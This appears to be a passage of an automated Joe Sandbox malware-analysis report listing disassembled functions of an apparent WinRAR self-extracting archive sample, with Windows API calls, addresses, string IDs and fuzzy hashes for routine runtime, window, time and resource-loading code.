                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00FA293F
                                          • _ValidateLocalCookies.LIBCMT ref: 00FA29C8
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00FA29F3
                                          • _ValidateLocalCookies.LIBCMT ref: 00FA2A48
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 622e33a41e08bbea57515e3739c002c1ecd116d623726608a087a35757712fc3
                                          • Instruction ID: fc655f0c3ab9f2abdcf3e6e619999cb7a43b444e0fa8edebd77089772ae0f59e
                                          • Opcode Fuzzy Hash: 622e33a41e08bbea57515e3739c002c1ecd116d623726608a087a35757712fc3
                                          • Instruction Fuzzy Hash: 0241D174F00218AFCF10DF2CCC84A9EBBB1AF0A724F148155E814AB292C739DA05EF91
                                          Function 00F99ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(?,00000000), ref: 00F99EEE
                                          • GetWindowRect.USER32(?,00000000), ref: 00F99F44
                                          • ShowWindow.USER32(?,00000005,00000000), ref: 00F99FDB
                                          • SetWindowTextW.USER32(?,00000000), ref: 00F99FE3
                                          • ShowWindow.USER32(00000000,00000005), ref: 00F99FF9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Window$Show$RectText
                                          • String ID: RarHtmlClassName
                                          • API String ID: 3937224194-1658105358
                                          • Opcode ID: a3b4726f17b3ee1c34c5c489c0ac1bd247ebbed12b6c728e856b972725efe6f8
                                          • Instruction ID: 0cb7f63fecf6559a5007a2a51e0500ed8dce3c109c00554c5398fa9efed0a4f8
                                          • Opcode Fuzzy Hash: a3b4726f17b3ee1c34c5c489c0ac1bd247ebbed12b6c728e856b972725efe6f8
                                          • Instruction Fuzzy Hash: AD41D232808314AFEF215F689C8DB2BBBA8EF48715F00455DF8059A166CB78D914EFA1
                                          Function 00F99955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                          • API String ID: 176396367-3743748572
                                          • Opcode ID: df8c2bcc2b7e0ab926380378738adcb31363f95af81fb037431799b91c728daf
                                          • Instruction ID: 5e04b3ced8be8d5ff07be0a372b97eeabcfaaaf69ac610ac1582a474c9844388
                                          • Opcode Fuzzy Hash: df8c2bcc2b7e0ab926380378738adcb31363f95af81fb037431799b91c728daf
                                          • Instruction Fuzzy Hash: 5D318E72A4830556FE34AB589C42B7673A4EB91330F55841FF48287280FAE8AD84A3A1
                                          Function 00FAC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00FAC868: _free.LIBCMT ref: 00FAC891
                                          • _free.LIBCMT ref: 00FAC8F2
                                            • Part of subcall function 00FA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34), ref: 00FA8DE2
                                            • Part of subcall function 00FA8DCC: GetLastError.KERNEL32(00FB3A34,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34,00FB3A34), ref: 00FA8DF4
                                          • _free.LIBCMT ref: 00FAC8FD
                                          • _free.LIBCMT ref: 00FAC908
                                          • _free.LIBCMT ref: 00FAC95C
                                          • _free.LIBCMT ref: 00FAC967
                                          • _free.LIBCMT ref: 00FAC972
                                          • _free.LIBCMT ref: 00FAC97D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                          • Instruction ID: e7b59a2aeeab7fa637f3bdbe939bf823b3173c22e53904ead0f1249f869fa3ca
                                          • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                          • Instruction Fuzzy Hash: 9511EFF1580B04AAE521BBB1CC47FCB7BECAF16B40F404C15B2DD66192DBADB506A790
                                          Function 00F9E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00F9E669,00F9E5CC,00F9E86D), ref: 00F9E605
                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00F9E61B
                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00F9E630
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                          • API String ID: 667068680-1718035505
                                          • Opcode ID: da11c28cae9dc0db106bdf0906d5e09539be3f8e6d8a658cb759a9030537f4c0
                                          • Instruction ID: 9e40aaa8d970e0b6b87b1862bf4271e57e4ccf18ecf9a64d1ae66d1c8a7a4ec6
                                          • Opcode Fuzzy Hash: da11c28cae9dc0db106bdf0906d5e09539be3f8e6d8a658cb759a9030537f4c0
                                          • Instruction Fuzzy Hash: A7F0C232BA02665B2F31DE6E9CC46FA32C87A25BA93140539D901D7100EB24CC50BE91
                                          Function 00F9146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F914C2
                                            • Part of subcall function 00F8B146: GetVersionExW.KERNEL32(?), ref: 00F8B16B
                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F914E6
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F91500
                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00F91513
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F91523
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F91533
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Time$File$System$Local$SpecificVersion
                                          • String ID:
                                          • API String ID: 2092733347-0
                                          • Opcode ID: 6a98936f21348cc1ad95037c02635c03ad115323a78c434569a34ebf420ed8d6
                                          • Instruction ID: fe49440626ff21b3ab6e4361faecda3988f125fd9bc4d246fea78df7ec147077
                                          • Opcode Fuzzy Hash: 6a98936f21348cc1ad95037c02635c03ad115323a78c434569a34ebf420ed8d6
                                          • Instruction Fuzzy Hash: A531D77550834AABC704DFA8C88499BB7ECFF98754F044A2EF995C3210E730D549CBA6
                                          Function 00FA2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00FA2AF1,00FA02FC,00F9FA34), ref: 00FA2B08
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FA2B16
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FA2B2F
                                          • SetLastError.KERNEL32(00000000,00FA2AF1,00FA02FC,00F9FA34), ref: 00FA2B81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 87b4a087926d259280d983d8acc8184ffe8b9ada186cd1a5258656e32ca9f414
                                          • Instruction ID: d396336f4a1053463519eec593a84c00cab39351c99db084a1e834f15a73dfee
                                          • Opcode Fuzzy Hash: 87b4a087926d259280d983d8acc8184ffe8b9ada186cd1a5258656e32ca9f414
                                          • Instruction Fuzzy Hash: 8301F1F270931D6FE6542B786CC5A663B58EF837F47300339F021504E0EE115C00B620
                                          Function 00FA97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,00FC1030,00FA4674,00FC1030,?,?,00FA3F73,00000050,?,00FC1030,00000200), ref: 00FA97E9
                                          • _free.LIBCMT ref: 00FA981C
                                          • _free.LIBCMT ref: 00FA9844
                                          • SetLastError.KERNEL32(00000000,?,00FC1030,00000200), ref: 00FA9851
                                          • SetLastError.KERNEL32(00000000,?,00FC1030,00000200), ref: 00FA985D
                                          • _abort.LIBCMT ref: 00FA9863
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: 67390e0cf28023c2be827d21e526871108767c2cdaaca73d3c43e582398b534f
                                          • Instruction ID: 6b710081df996f6ec511867ea7a379779ff707679db435db04337c75259a35a8
                                          • Opcode Fuzzy Hash: 67390e0cf28023c2be827d21e526871108767c2cdaaca73d3c43e582398b534f
                                          • Instruction Fuzzy Hash: BBF02DF654860566C6113334BC49B5B3B698FD37B1F740134F524921D2FFACC806B551
                                          Function 00F9DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F9DC47
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F9DC61
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9DC72
                                          • TranslateMessage.USER32(?), ref: 00F9DC7C
                                          • DispatchMessageW.USER32(?), ref: 00F9DC86
                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F9DC91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                          • String ID:
                                          • API String ID: 2148572870-0
                                          • Opcode ID: 9a9a4630dc6661328a2cccc346bd0c36f9f34f08c53e598ae12547e5a3cd655f
                                          • Instruction ID: 2601af97d979b5ad32b1b0ce0e5634cf4a9e2a849336f25f3ea60b9220ebbae0
                                          • Opcode Fuzzy Hash: 9a9a4630dc6661328a2cccc346bd0c36f9f34f08c53e598ae12547e5a3cd655f
                                          • Instruction Fuzzy Hash: 03F08C32E0022DBBCF20ABA1DC8CDDB7F6CEF417A5B004011F60AD6010D6349646DBA0
                                          Function 00F8C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F905DA: _wcslen.LIBCMT ref: 00F905E0
                                            • Part of subcall function 00F8B92D: _wcsrchr.LIBVCRUNTIME ref: 00F8B944
                                          • _wcslen.LIBCMT ref: 00F8C197
                                          • _wcslen.LIBCMT ref: 00F8C1DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen$_wcsrchr
                                          • String ID: .exe$.rar$.sfx
                                          • API String ID: 3513545583-31770016
                                          • Opcode ID: 8dbf543aef99418e8baf3968e35b370304946497e7dc1d802b06967d12291c02
                                          • Instruction ID: 403abdfab8bf41a761a2af5d2bc4e66278e25cb4118ff025b37e6e5d45d5b300
                                          • Opcode Fuzzy Hash: 8dbf543aef99418e8baf3968e35b370304946497e7dc1d802b06967d12291c02
                                          • Instruction Fuzzy Hash: 5741242295071599DB31BF348C86AFAB3A8EF41764F10050EF881AB0C1EB748981B3F1
                                          Function 00F9CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000800,?), ref: 00F9CE9D
                                            • Part of subcall function 00F8B690: _wcslen.LIBCMT ref: 00F8B696
                                          • _swprintf.LIBCMT ref: 00F9CED1
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          • SetDlgItemTextW.USER32(?,00000066,00FC946A), ref: 00F9CEF1
                                          • EndDialog.USER32(?,00000001), ref: 00F9CFFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                          • String ID: %s%s%u
                                          • API String ID: 110358324-1360425832
                                          • Opcode ID: 2a32018599edc68e08725bf25edad9ae7907887e49512e78d4406643a549388a
                                          • Instruction ID: 616f4002512788f163a09d9cdd23d44fa8b748811fb1f0c3a48a8461b47e4bf1
                                          • Opcode Fuzzy Hash: 2a32018599edc68e08725bf25edad9ae7907887e49512e78d4406643a549388a
                                          • Instruction Fuzzy Hash: 7241A0B1800259AAEF25DB90CC45FEE77BCEB04351F4080A6F909E7051EE759A44EFB2
                                          Function 00F8BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcslen.LIBCMT ref: 00F8BB27
                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00F8A275,?,?,00000800,?,00F8A23A,?,00F8755C), ref: 00F8BBC5
                                          • _wcslen.LIBCMT ref: 00F8BC3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen$CurrentDirectory
                                          • String ID: UNC$\\?\
                                          • API String ID: 3341907918-253988292
                                          • Opcode ID: 8a4ca7fc612b0e22aeac6e342aba723d065384843dad618574a7ff5fc97ed4f8
                                          • Instruction ID: 00d28e95f5f6e9072b62810be0d2f9cf269f8c4e286286efeefdb75326e0ad63
                                          • Opcode Fuzzy Hash: 8a4ca7fc612b0e22aeac6e342aba723d065384843dad618574a7ff5fc97ed4f8
                                          • Instruction Fuzzy Hash: B341B132940216BADF21BF61CC41EEE77ADAF423A0F144465F854A3251EF74DA90FB60
                                          Function 00F9B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadBitmapW.USER32(00000065), ref: 00F9B6ED
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00F9B712
                                          • DeleteObject.GDI32(00000000), ref: 00F9B744
                                          • DeleteObject.GDI32(00000000), ref: 00F9B767
                                            • Part of subcall function 00F9A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00F9B73D,00000066), ref: 00F9A6D5
                                            • Part of subcall function 00F9A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A6EC
                                            • Part of subcall function 00F9A6C2: LoadResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A703
                                            • Part of subcall function 00F9A6C2: LockResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A712
                                            • Part of subcall function 00F9A6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00F9B73D,00000066), ref: 00F9A72D
                                            • Part of subcall function 00F9A6C2: GlobalLock.KERNEL32 ref: 00F9A73E
                                            • Part of subcall function 00F9A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00F9A762
                                            • Part of subcall function 00F9A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F9A7A7
                                            • Part of subcall function 00F9A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00F9A7C6
                                            • Part of subcall function 00F9A6C2: GlobalFree.KERNEL32(00000000), ref: 00F9A7CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                          • String ID: ]
                                          • API String ID: 1797374341-3352871620
                                          • Opcode ID: 7c31deace1047a235d65b6981366a3f065c9ee319be964d7a57527149c736638
                                          • Instruction ID: 9a8ab5d551d7289afae5520381eed1295726e2cae9947c56ce1f93d875353cfb
                                          • Opcode Fuzzy Hash: 7c31deace1047a235d65b6981366a3f065c9ee319be964d7a57527149c736638
                                          • Instruction Fuzzy Hash: DB01263290011577EF2277B46D4DA7F7A7AAFC0B62F090110FA00A7291DF258D0576A2
                                          Function 00F9D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • EndDialog.USER32(?,00000001), ref: 00F9D64B
                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00F9D661
                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F9D675
                                          • SetDlgItemTextW.USER32(?,00000068), ref: 00F9D684
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ItemText$DialogWindow
